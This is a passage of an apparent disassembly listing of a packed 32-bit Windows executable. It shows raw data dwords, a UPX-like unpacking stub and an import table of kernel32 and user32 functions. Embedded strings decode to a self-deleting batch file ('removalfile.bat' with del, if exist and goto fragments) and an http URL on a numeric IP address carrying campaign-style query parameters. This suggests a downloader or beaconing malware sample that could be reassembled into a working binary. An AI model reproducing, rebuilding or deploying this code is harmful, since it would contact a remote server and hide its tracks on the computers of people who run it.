dd 490128ECh, 0F6FEED5Dh, 17DCBEDDh, 0A5EC7D8Dh, 50EC42A5h
dd 10F845C7h, 0DCA56661h, 2FB36EF6h, 24046818h, 0FED8858Dh
dd 6D865063h, 72D9EFB7h, 56783D14h, 3F5B038Ch, 0FEDEE53h
dd 228090F6h, 0F883D7FFh, 0F8989FFh, 0F6158984h, 216B05EDh
dd 8B1AAF1Eh, 8FB83D8h, 0DB67B667h, 8BFC020Bh, 104868EBh
dd 75BB76D6h, 0D715F3DFh, 7543F8C4h, 50DC06F8h, 2C723626h
dd 33C30C36h, 2D2F358Bh, 374CC2ECh, 320DA653h, 0F6FDF453h
dd 342B366Eh, 0D6FF0975h, 0C033D615h, 1FB705EBh, 0FE088B5Eh
dd 5D8B55FCh, 0EC68FA10h, 61FDB36Dh, 45C653E2h, 303E00FFh
dd 774FC303h, 15D8DD78h, 510C3F58h, 0B7D225Ch, 5EEBE1FCh
dd 2C26AD60h, 0F009E813h, 0E856686Ah, 872C8C2Eh, 42868528h
dd 0BD240D57h, 784EEB10h, 0A204636h, 28741010h, 0F277786Eh
dd 0B01C1C19h, 1EE85310h, 0CC48331h, 0EB5DBB6Bh, 600C0B10h
dd 1845955h, 66A5038Ah, 830F867Bh, 0E09F10ECh, 366F6C3Ah
dd 0F0096CD3h, 0F340538h, 7BF855B7h, 8BCA17FBh, 0E0C16FC8h
dd 0FC20B10h, 4DAF0BAFh, 7FF703F0h, 0D233FFE3h, 0C18B196Ah
dd 0EF7F75Fh, 61C28008h, 86583h, 0FF141688h, 56DDBF6h
dd 0F3F7155Bh, 17E8D1Bh, 0BE30BE0Fh, 99C20316h, 0DBFFF75Eh
dd 14FEB7EEh, 8B590A6Ah, 178829F7h, 0FFF1F725h, 7D830845h
dd 0E1360708h, 7C5B6E1Bh, 6C604CBh, 1256462Eh, 0F0C34299h
dd 2083C63h, 6EF711DFh, 0FCCDBAECh, 501BF068h, 8F801C3h
dd 0AFB7FDF8h, 50176671h, 0E55214AEh, 0DECD8414h, 6A032FFEh
dd 83465E63h, 0CA7C1EFEh, 29756404h, 8FB43429h, 4844D0D0h
dd 1674F685h, 6040242Eh, 29F74DCh, 3C0CD0FFh, 0B15EC032h
dd 0E4C3C6E7h, 56B10470h, 21FC9495h, 0DBC9C3D8h, 57A4BF53h
dd 0DEDBAB15h, 500C364Ch, 774C73Bh, 0B223E94Ah, 476E6F1h
dd 0FB901764h, 0FF5D8856h, 0B6714CD1h, 16DD2F60h, 0ECC79898h
dd 35B0D08Dh, 131A84FCh, 0C66CDD44h, 53805346h, 85D13D4h
dd 3C6CB1FFh, 0AFF8F6C3h, 0E44D8D28h, 63676A51h, 682BE1C6h
dd 0F3921494h, 0A593D8F8h, 9C2E4764h, 0F214F868h, 0DB3B364h
dd 0D61DAFD6h, 0A5FDF468h, 106A07C6h, 0A4A8C859h, 5D89ABF3h
dd 0A371B2E8h, 0ABB035h, 0F950E811h, 60A6CCA0h, 1C2900B1h
dd 6D9144A0h, 0CCCA973Bh, 85D02D01h, 0F8D6B48h, 5E19ECA7h
dd 5166950Fh, 18614310h, 7004E86Dh, 228565Eh, 0C08BFDCCh
dd 905850h, 0A1B37607h, 3108688Fh, 443000B2h, 0DA080824h
dd 21D08CC8h, 10846883h, 3B76A79Bh, 492028Ch, 54C50703h
dd 7FF00CCh, 48006404h, 506B6F6Fh, 636F72h, 37FFF56Fh
dd 6F6D6572h, 666C6176h, 2E656C69h, 0F6746162h, 0FF686365h
dd 6FFFBBF6h, 66666F20h, 643A0A0Dh, 6C656404h, 0C312520h
dd 65206669h, 0FF736978h, 749BDAD6h, 746F6720h, 753B1C22h
dd 6C6C646Eh, 0DBBF3233h, 192EB6DFh, 2C731765h, 69746341h
dd 5765744Bh, 0B9DB7A61h, 6378FEEFh, 65777364h, 49420B71h
dd 75C004Eh, 722002Ch, 0AF77FFFBh, 68000420h, 3A707474h
dd 35362F2Fh, 3334322Eh, 330312Eh, 7B5BFDBFh, 5C2F3036h
dd 6D633F11h, 6D763D70h, 755F6B49h, 0BBC96470h, 265177DDh
dd 3D64696Ch, 775266Eh, 67267325h, 0A420207Fh, 564441DCh
dd 1495041h, 0B4C3861h, 22296E4h, 118A0230h, 40248110h
dd 3FF4204h, 49004200h, 0AC4E4E00h, 39461028h, 94101124h
dd 0A8028C8h, 150051B0h, 82AFFE08h, 44415002h, 474E4944h
dd 5185858h, 1B0F4164h, 718CAAAAh, 0F2FF0C60h, 110E5FFh
dd 736F6C43h, 6E614865h, 57656C64h, 65746972h, 0F2D96946h
dd 430A7FB3h, 0B616572h, 52010041h, 6D971664h, 6553F7FBh
dd 6F500874h, 721D6E69h, 6F4D470Fh, 0EC7BFDB7h, 296C7564h
dd 2D6D614Eh, 7274736Ch, 0D8096E0Ch, 537EDF9Bh, 6F657A69h
dd 6F733D66h, 4C637275h, 0D6B636Fh, 1E4B6D93h, 6E406461h
dd 0D9ED410Dh, 9B58602Ch, 5A795311h, 0F6FD9EDBh, 69446D65h
dd 6F74639Bh, 54147972h, 36435469h, 5AC05AEBh, 8913228Fh
dd 0FED69373h, 5C09DEE6h, 694C6531h, 34617262h, 82EEDD25h
dd 64418222h, 73731564h, 9B06C37Bh, 0F8411C87h, 0DB661C20h
dd 5061982Dh, 68145070h, 0B5B6BF0Dh, 0E2741311h, 21277531h
dd 67BD7845h, 2F350AC1h, 487063FCh, 8B5D2521h, 53343509h
dd 9FC35980h, 77686D66h, 4C727073h, 584F5C66h, 0FE43DB68h
dd 735ED973h, 0FF4550CEh, 4C2FF90Fh, 9C000401h, 0E046F11Dh
dd 0B010F00h, 0A0701h, 9E4F7D0Eh, 146D8C34h, 400D2000h
dd 9CB60B37h, 3304020Bh, 67600C07h, 1ED0496Eh, 90071034h
dd 66F65EDh, 52214400h, 6040BA3Ch, 34866074h, 5D8674A7h
dd 2E1EC818h, 8C747824h, 0F7D94F85h, 4204EB03h, 64722E60h
dd 17D85B61h, 23FB61B0h, 0BBA2712h, 40B66CECh, 3027262Eh
dd 0B0AF9D73h, 4FC02775h, 9010B373h, 0D3495B5Bh, 2916884Fh
dd 0F40Dh, 0A7219FC0h, 200000C1h, 0FF000001h, 0E000BE60h
dd 0BE8D0040h, 0FFFF3000h, 0FFCD8357h, 909010EBh, 90909090h
dd 8846068Ah, 0DB014707h, 1E8B0775h, 11FCEE83h, 0B8ED72DBh
dd 1, 775DB01h, 0EE831E8Bh, 11DB11FCh, 73DB01C0h, 8B0975EFh
dd 0FCEE831Eh, 0E473DB11h, 0E883C931h, 0C10D7203h, 68A08E0h
dd 0FFF08346h, 0C5897474h, 775DB01h, 0EE831E8Bh, 11DB11FCh
dd 75DB01C9h, 831E8B07h, 0DB11FCEEh, 2075C911h, 75DB0141h
dd 831E8B07h, 0DB11FCEEh, 0DB01C911h, 975EF73h, 0EE831E8Bh
dd 73DB11FCh, 2C183E4h, 0F300FD81h, 0D183FFFFh, 2F148D01h
dd 76FCFD83h, 42028A0Fh, 49470788h, 63E9F775h, 90FFFFFFh
dd 0C283028Bh, 83078904h, 0E98304C7h, 1F17704h, 0FF4CE9CFh
dd 895EFFFFh, 6B9F7h, 78A0000h, 3CE82C47h, 80F77701h, 0F275003Fh
dd 5F8A078Bh, 0E8C16604h, 10C0C108h, 0F829C486h, 1E8EB80h
dd 830789F0h, 0D88805C7h, 0BE8DD9E2h, 0C000h, 0C009078Bh
dd 5F8B3C74h, 30848D04h, 16664h, 8350F301h, 96FF08C7h
dd 166A0h, 47078A95h, 0DC74C008h, 4857F989h, 0FF55AEF2h
dd 166A496h, 74C00900h, 83038907h, 0E1EB04C3h, 66B496FFh
dd 0AE8B0001h, 166A8h, 0F000BE8Dh, 0BBFFFFh, 50000010h
dd 53046A54h, 8DD5FF57h, 1F787h, 7F208000h, 7F286080h
dd 50545058h, 0D5FF5753h, 448D6158h, 6A8024h, 0FA75C439h
dd 0E980EC83h, 0FFFF2D0Dh, 228h dup(0)
_data ends
; Section 4. (virtual address 00018000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00018000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_idata segment para public 'DATA' use32
assume cs:_idata
;org 418000h
dd 77E61608h, 77E73BEFh, 77E76A2Eh, 77E72B29h, 77E760B5h
dd 77E79908h, 77E64106h, 77E72C64h, 0
dd 77D474CBh, 77D4A3BCh, 77D70EA0h, 77D474ADh, 77D4CBFFh
dd 77D4BFABh, 0
dd 180A0h, 2 dup(0)
dd 1811Eh, 18024h, 1807Ch, 2 dup(0)
dd 181B6h, 18000h, 5 dup(0)
dd 18146h, 181AAh, 1819Eh, 18194h, 18184h, 18168h, 18156h
dd 1812Ah, 0
dd 18112h, 180FEh, 180F0h, 180E4h, 180D6h, 180BCh, 0
dd 63410000h, 61766974h, 654B6574h, 616F6279h, 614C6472h
dd 74756F79h, 1E0000h, 72616843h, 65776F4Ch, 4172h, 6F430040h
dd 65527970h, 7463h, 7243004Ch, 65746165h, 6E6F6349h, 0AC0000h
dd 44646E45h, 72656665h, 646E6957h, 6F50776Fh, 0C40073h
dd 61757145h, 6365526Ch, 73750074h, 32337265h, 6C6C642Eh
dd 11B0000h, 50746547h, 61766972h, 72506574h, 6C69666Fh
dd 72745365h, 41676E69h, 1400000h, 53746547h, 65747379h
dd 6D69546Dh, 1530065h, 54746547h, 46656D69h, 616D726Fh
dd 4174h, 6E49018Bh, 61697469h, 657A696Ch, 74697243h, 6C616369h
dd 74636553h, 6E6F69h, 6F4C01A9h, 65526461h, 72756F73h
dd 6563h, 6C54026Dh, 65724673h, 2B90065h, 7274736Ch, 69706D63h
dd 2BD0041h, 7274736Ch, 6E797063h, 656B0041h, 6C656E72h
dd 642E3233h, 6C6Ch, 8Bh dup(0)
dd 36000000h, 34303637h, 302h dup(0)
_idata ends
; Section 5. (virtual address 00019000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00019000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 419000h
align 2000h
_idata2 ends
end start